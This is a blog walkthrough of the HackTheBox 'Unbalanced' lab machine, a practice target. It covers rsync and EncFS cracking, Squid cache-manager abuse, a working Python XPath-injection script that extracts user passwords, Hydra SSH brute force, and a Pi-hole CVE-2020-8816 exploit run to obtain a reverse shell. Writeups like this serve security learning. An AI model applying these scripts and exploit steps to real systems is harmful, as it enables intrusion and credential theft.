HackTheBox Unbalanced Writeup – 10.10.10.200

Welcome back, folks. This writeup is about the HackTheBox Unbalanced machine (10.10.10.200) that released last Saturday.

Initial Foothold and the user

The initial foothold was finding the RSync from NMAP scan, then downloading the RSync directories to find them encrypted. Cracking the encrypted directories using John reveals the hidden configuration files that led me to gain control over the Squid Proxy. The User was harder than getting root, the X-path vulnerability in the login page ultimately reveals the credentials so finally I was able to SSH and get the user. The deep enumeration is must.

The Root

The User Bryan has a To-Do list which reveals incomplete section of the application he’s developing. Further enumeration reveals Pi-hole is the application and the installed version is vulnerable, a public exploit gives access to reverse shell and then a bash script reveals an Administrator password that gives privilege escalation as root.

Let me clear the point first, This machine is *insane*

OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200

Enumeration

As a best practice I add the machine IP to my hosts file as unbalanced.htb and started-off with NAMP scan. The NMAP scan reveals the port 22, 873 and 3128 are open. However, strangely the port 80 or 8080 isn’t open which is obvious.

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

RSync

As I can see RSync port is open the service is running, I went ahead and list the modules

root@nav1n:~/htb/unbalanced # rsync -a rsync://unbalanced.htb:873
conf_backups   	EncFS-encrypted configuration backups
root@nav1n:~/htb/unbalanced # 

Let us download the directories and analyze them.

root@nav1n:~/htb/unbalanced # rsync -av rsync://unbalanced.htb/conf_backups conf_backups
receiving incremental file list
created directory conf_backups
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5

sent 1,452 bytes  received 411,990 bytes  33,075.36 bytes/sec
total size is 405,603  speedup is 0.98
root@nav1n:~/htb/unbalanced # 

After downloading the files and doing some analysis I figured out that these are EncFS encrypted file-system. Also, I found an .encfs6.xml file with the following content.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
    <cfg class_id="0" tracking_level="0" version="20">
        <version>20100713</version>
        <creator>EncFS 1.9.5</creator>
        <cipherAlg class_id="1" tracking_level="0" version="0">
            <name>ssl/aes</name>
            <major>3</major>
            <minor>0</minor>
        </cipherAlg>
        <nameAlg>
            <name>nameio/block</name>
            <major>4</major>
            <minor>0</minor>
        </nameAlg>
        <keySize>192</keySize>
        <blockSize>1024</blockSize>
        <plainData>0</plainData>
        <uniqueIV>1</uniqueIV>
        <chainedNameIV>1</chainedNameIV>
        <externalIVChaining>0</externalIVChaining>
        <blockMACBytes>0</blockMACBytes>
        <blockMACRandBytes>0</blockMACRandBytes>
        <allowHoles>1</allowHoles>
        <encodedKeySize>44</encodedKeySize>
        <encodedKeyData>
GypYDeps2hrt2W0LcvQ94TKyOfUcIkhSAw3+iJLaLK0yntwAaBWj6EuIet0=
</encodedKeyData>
        <saltLen>20</saltLen>
        <saltData>
mRdqbk2WwLMrrZ1P6z2OQlFl8QU=
</saltData>
        <kdfIterations>580280</kdfIterations>
        <desiredKDFDuration>500</desiredKDFDuration>
    </cfg>
</boost_serialization>

The XML file contains the metadata and the key data. Looking for solutions to decrypt the files, I found a potential solution in the GitHub. The Python script that could potentially crack the eCryptfs. As per the documentation, I run the cracker encfs2john.py as follows and got the hash from the encrypted folder conf_backups.

root@nav1n:~/htb/unbalanced # python encfs2john.py conf_backups/ > unbalanced.hash     
root@nav1n:~/htb/unbalanced # cat unbalanced.hash 
conf_backups/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add

Once I have the hash, ran it through John using the Rockyou as word file to get the passphrase. John cracked the Passphrase successfully: bubblegum

root@nav1n:~/htb/unbalanced # john --wordlist=/usr/share/wordlists/rockyou.txt unbalanced.hash
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bubblegum        (conf_backups/)
1g 0:00:00:43 DONE (2020-08-03 18:52) 0.02282g/s 16.43p/s 16.43c/s 16.43C/s bambam..marissa
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@nav1n:~/htb/unbalanced # 

Decrypting The Directory

To decrypt the encrypted directory, I need Encfs (EncFS Encrypted File system) to be installed locally. The GitHub repo has full detailed documentation. I installed EncFS by referring the documentation and after installation and reading a couple of blog posts, I understood how the Encfs works. A quick googling, I found an article that shows how to mount encrypted EncFS and how to decrypt it using the passphrase.

As I already have the passphrase, I successfully mount the encrypted the directory and decrypt it. Going through the newly created conf_backups_decryped directory I noticed a lot of xxxxxxxxxxxx.conf files.

root@nav1n:~/htb/unbalanced # encfs /conf_backups/ /conf_backups_decryped/
EncFS Password: 
root@nav1n:~/htb/unbalanced # cd conf_backups_decryped 
root@nav1n:~/htb/unbalanced/conf_backups_decryped # ls -la
total 628
drwxr-xr-x 2 root root   4096 Apr  4 18:05 .
drwxr-xr-x 7 root root   4096 Aug  3 19:11 ..
-rw-r--r-- 1 root root    267 Apr  4 18:05 50-localauthority.conf
-rw-r--r-- 1 root root    455 Apr  4 18:05 50-nullbackend.conf
-rw-r--r-- 1 root root     48 Apr  4 18:05 51-debian-sudo.conf
-rw-r--r-- 1 root root    182 Apr  4 18:05 70debconf
-rw-r--r-- 1 root root   2351 Apr  4 18:05 99-sysctl.conf
-rw-r--r-- 1 root root   4564 Apr  4 18:05 access.conf
-rw-r--r-- 1 root root   2981 Apr  4 18:05 adduser.conf
-rw-r--r-- 1 root root   1456 Apr  4 18:05 bluetooth.conf
======snip========

Going through the list of files, I noticed “squid.conf“, this file caught my attention because I saw the Squid proxy is running on the port 3128 in the Unbalanced machine.

The configuration file contains the following:

The ACL (Access control lists)

acl localnet src 0.0.0.1-0.255.255.255	# RFC 1122 "this" network (LAN)
acl localnet src 10.0.0.0/8		# RFC 1918 local private network (LAN)
acl localnet src 100.64.0.0/10		# RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 	# RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12		# RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16		# RFC 1918 local private network (LAN)
acl localnet src fc00::/7       	# RFC 4193 local private network range
acl localnet src fe80::/10      	# RFC 4291 link-local (directly plugged) machines

acl SSL_ports port 443
acl Safe_ports port 80		# http
acl Safe_ports port 21		# ftp
acl Safe_ports port 443		# https
acl Safe_ports port 70		# gopher
acl Safe_ports port 210		# wais
acl Safe_ports port 1025-65535	# unregistered ports
acl Safe_ports port 280		# http-mgmt
acl Safe_ports port 488		# gss-http
acl Safe_ports port 591		# filemaker
acl Safe_ports port 777		# multiling http
acl CONNECT method CONNECT

A New Subdomain

I found a new subdomain intranet.unbalanced.htb

# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net

# And finally deny all other access to this proxy
http_access deny all
#http_access allow all

Cache Manager Credentials

cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all

The Squid Proxy

As I can see there is a new subdomain intranet.unbalanced.htb running, but can only be accessed through Squid proxy on the port 3128, I need to install it first.

Installed / Enabled and Running

Then, I update the Firefox proxy set as Unbalanced proxy setting:

Then, I browse the subdomain http://intranet.unbalanced.htb but it didn’t work, I was getting unable to load error, I tried different settings in the proxy but didn’t work. After a few minutes trail and error, I realized I supposed to replace the squid.conf with the one I found in the decrypted folder. I replaced the configuration file and restart the squid service and browse the page again and there it goes, I have the page opened.

The http://intranet.unbalanced.htb

GoBuster to Discover Files

As the login page didn’t allow me to do any exploit, I decided to run GoBuster to find possible files and directories that may have hidden from direct access. After running GoBuster a while, I found the following files:

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://intranet.unbalanced.htb
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] Proxy:          http://10.10.10.200:3128
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,log,php,xml,cgi,htm
[+] Timeout:        10s
===============================================================
2020/08/03 20:12:22 Starting gobuster
===============================================================
/css (Status: 301) [Size: 194]
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/control.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/corba.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml (Status: 403) [Size: 178]
/index.php (Status: 302) [Size: 0]
/index.php (Status: 302) [Size: 0]
/intranet.php (Status: 200) [Size: 6736]
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/registered.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/rcs.htm: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml - 403
/index.php - 302
/intranet.php - 200

Except the intranet.php, the other two files were unable to access. So I need to find another way to go forward. I recalled the Cache Manager credential I found in the decryption process earlier. Looking for Squid Cache manager I found an article.based on the article I browse the bellow url

http://mycache.example.com:3128/squid-internal-mgr/info

And got access denied, it means there is something I could still be able to exploit.

Finding different Hosts and Subnets in the network.

As I know from the previously found ACL, there are other subnets in the network, possibly only be able to access from the Squid:

acl localnet src 100.64.0.0/10		# RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 	# RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12		# RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16		# RFC 1918 local private network (LAN)

Referring this article again to I started to find hosts within the subnets mentioned in the ACL. Upon checking the Class B address.

SQUIDClinet Command:

SquidClient is a tool that I downloaded to run the Squid commands from my local machine, since I already have Squid password, it’s easy for me to gather information.

squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu
root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu     
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
---snip----
Via: 1.1 unbalanced (squid/4.6)
Connection: close

 index                 	Cache Manager Interface         	disabled
 menu                  	Cache Manager Menu              	protected
 offline_toggle        	Toggle offline_mode setting     	disabled
 shutdown              	Shut Down the Squid Process     	disabled
 reconfigure           	Reconfigure Squid               	disabled
 rotate                	Rotate Squid Logs               	disabled
 pconn                 	Persistent Connection Utilization Histograms	protected
 mem                   	Memory Utilization              	protected
 diskd                 	DISKD Stats                     	protected
 squidaio_counts       	Async IO Function Counters      	disabled
 config                	Current Squid Configuration     	disabled
 client_list           	Cache Client List               	disabled
 comm_epoll_incoming   	comm_incoming() stats           	disabled
 ipcache               	IP Cache Stats and Contents     	disabled
 fqdncache             	FQDN Cache Stats and Contents   	protected
 idns                  	Internal DNS Statistics         	disabled
 redirector            	URL Redirector Stats            	disabled
 store_id              	StoreId helper Stats            	disabled
 external_acl          	External ACL stats              	disabled
 http_headers          	HTTP Header Statistics          	disabled
 info                  	General Runtime Information     	disabled
 service_times         	Service Times (Percentiles)     	disabled
 filedescriptors       	Process Filedescriptor Allocation	protected
 objects               	All Cache Objects               	protected
 vm_objects            	In-Memory and In-Transit Objects	protected
 io                    	Server-side network read() size histograms	disabled
 counters              	Traffic and Resource Counters   	protected
 peer_select           	Peer Selection Algorithms       	disabled
 digest_stats          	Cache Digest and ICP blob       	disabled
 5min                  	5 Minute Average of Counters    	protected
 60min                 	60 Minute Average of Counters   	protected
 utilization           	Cache Utilization               	disabled
 histograms            	Full Histogram Counts           	protected
 active_requests       	Client-side Active Requests     	disabled
 username_cache        	Active Cached Usernames         	disabled
 openfd_objects        	Objects with Swapout files open 	disabled
 store_digest          	Store Digest                    	disabled
 store_log_tags        	Histogram of store.log tags     	disabled
 storedir              	Store Directory Stats           	disabled
 store_io              	Store IO Interface Stats        	disabled
 store_check_cachable_stats	storeCheckCachable() Stats      	disabled
 refresh               	Refresh Algorithm Statistics    	disabled
 delay                 	Delay Pool Levels               	disabled
 forward               	Request Forwarding Statistics   	disabled
 cbdata                	Callback Data Registry Contents 	protected
 sbuf                  	String-Buffer statistics        	protected
 events                	Event Queue                     	protected
 netdb                 	Network Measurement Database    	disabled
 asndb                 	AS Number Database              	disabled
 carp                  	CARP information                	disabled
 userhash              	peer userhash information       	disabled
 sourcehash            	peer sourcehash information     	disabled
 server_list           	Peer Cache Statistics           	disabled
root@nav1n:~/htb/unbalanced # 

Going further and analyzing the different menus, I found fqdncache. Since FQDN is fully qualified domain names, I decided to run and here is the result:

root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
---snip----

FQDN Cache Statistics:
FQDNcache Entries In Use: 11
FQDNcache Entries Cached: 9
FQDNcache Requests: 11573
FQDNcache Hits: 0
FQDNcache Negative Hits: 5333
FQDNcache Misses: 6240
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
10.10.14.172                                   N  -10704   0
127.0.0.1                                       H -001   1 localhost
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters

So, I have two new hosts intranet-host2.unbalanced.htb – 172.31.179.2 and intranet-host3.unbalanced.htb – 172.31.179.3. However, I was not able to access the URLs directly, but the website loaded using the direct IP. Both websites are either replica of the employee login page or redirect to the Intranet portal I found earlier: http://intranet.unbalanced.htb.

I load the IP 172.31.179.1 as it’s the only IP wasn’t listed in the hosts name, I was welcomed with following error:

But if I add intranet.php to the URL, I again received the similar login page I found earlier.

Testing the Login Vulnerability

As I normally do with all the previous login pages, I did the same SQLi ‘ or ”=’, luckily this page was vulnerable and I received the following users and their email ids.

So the vulnerable login page reveals 4 users with their email ids:

  • Rita – rita@unbalanced.htb | HR Manager
  • Jim – jim@unbalanced.htb | Web Designer
  • Bryan – bryan@unbalanced.htb | System Administrator
  • Sarah – sarah@unbalanced.htb | Team Leader

As we can see the x-path injection is possible to on the login page, I decided to try brute force the password. The payload must be single character at a time.

The Script:

url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita', 'jim', 'bryan', 'sarah']

for user in u:
        data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
        request = requests.post(url, data=data, proxies={'http':proxy_url})
        b = len(request.text)
        cracked_pass = ''
        for i in range(1,80):
                found = False
                for c in w:
                        data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c + ""}
                        request = requests.post(url, data=data, proxies={'http':proxy_url})
                        if len(request.text) != b:
                                found = True
                                break
                if not found:
                        break
                print('Attempting User {0}'.format(user)) 
		print('[+]Found character: {2}'.format(user, i, c))
                cracked_pass += c
        	
		print (cracked_pass)

I found the password of the all 4 users.

root@nav1n:~/htb/unbalanced # python crack.py
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'

The passwords were not that helpful on the web page, they just displayed the username and their profession and the email that’s it.

Getting the User Flag

Then, I tried the same credentials for SSH the Unbalanced box and found the credential matched for user Bryan.

root@nav1n:~/htb/unbalanced # hydra -l users.txt -P pass.txt 10.10.10.200 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 01:13:37
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://10.10.10.200:22/
[22][ssh] host: 10.10.10.200   login: bryan   password: ireallyl0vebubblegum!!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-04 01:13:43
root@nav1n:~/htb/unbalanced # 

I immediately SSH the box as Bryan. The user flag was found in Bryan’s home directly.

Having compromised the user, I proceed to enumerate Bryan’s directory. I found a file called “TODO”, reading it showed the following:

bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$ 

As per the TO-DO list, Bryan has installed Pi-hole locally which is listening on the local host only. A Pi-hole configuration file is created but not complete this triggers vulnerability. The Pi-hole is not exposed to external ports, so I need to find which port Pi-hole is listening to or open ports.

When I run the netstat command I come to know netstat is not installed in the system. So need to find another way. I found an article in the cPanel forum that shows how to netstat-without-netstat

The command:

# netstatawk - from https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
netstatawk() { ( awk 'function hextodec(str,ret,n,i,k,c){
    ret = 0
    n = length(str)
    for (i = 1; i <= n; i++) {
        c = tolower(substr(str, i, 1))
        k = index("123456789abcdef", c)
        ret = ret * 16 + k
    }
    return ret
}
function getIP(str,ret){
    ret=hextodec(substr(str,index(str,":")-2,2));
    for (i=5; i>0; i-=2) {
        ret = ret"."hextodec(substr(str,i,2))
    }
    ret = ret":"hextodec(substr(str,index(str,":")+1,4))
    return ret
}
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp ) }

I run the command from SSh through awk and here I found the ports listening. The result reveals, port 8080 and 5553 are listening locally.

I run the curl to find which port is hosting Pi-hole, the port 5553 seems unresponsive. And curling the port 8080 returns with error Invalid domain!

bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:5553
curl: (28) Operation timed out after 10001 milliseconds with 0 bytes received
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>
bryan@unbalanced:~$ 

And adding the domain unbalanced, I got the results as below:

bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
*  (c) 2017 Pi-hole, LLC (https://pi-hole.net)
------snip------

<footer><span>Monday 10:50 PM, August 03rd.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>

----snip-----
</body></html>
bryan@unbalanced:~$ 

The curl reveals another subdomain, pihole.unbalanced.htb is running on the local IP: 172.31.11.3. Again the url access is disabled, but I was able to access the web page through direct IP access.

As I know the Pi-hole dashboard is available on the page /admin, I browsed and I have the dashboard opened for me.

I logged-in using the http://172.31.11.3/admin/index.php?login page using the password “admin” as mentioned in the TODO list.

Admin Dashboard

Exploiting Pi-hole Version v4.3.2

As I saw the installed Pi-hole version 4.3.2, I knew there is a exploit for that. The version 4.3.2 is vulnerable to RCE which is given CVE-2020-8816.

Looking for the exploits, I found an exploit by AndreyRainchik, I immediately download it. However, I was not able to run the exploit remotely, So decided to do it locally by port forward pi-hole through SSH.

Getting Reverse Shell Ad www-data

I run the SSH port-forward:

root@nav1n:~/htb/unbalanced # ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200

I start my listener where I get the reverse shell after running the exploit (CVE-2020-8816) and run the exploit from another terminal:

root@nav1n:~/htb/unbalanced # python3 CVE-2020-8816.py http://127.0.0.1:8080 admin 10.10.14.22 9999

And here is the reverse shell as www-data.

Going through the directories, we found the www-data is able to read /root/. That’s insane. Inside the /root/ directory we found a couple of files, ph_install.sh and pihole_config.sh. I without wasting time, I read the pihole_config.sh, as assumed, it contained credentials of Administrator user + email id.

Root.txt

$ cat pihole_config.sh
#!/bin/bash
# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb
# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c
# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1
# Set privacy level
/usr/local/bin/pihole -a -l 4
# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'
# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$ 

As I now have the credentials of Admin, I moved to the SSH and SU as root with the new credential.

Thanks, it. I just pawned the Unbalanced machine. Thank you for your visit and hope you enjoyed this insane ride.

References

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

View all posts by Navin →
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.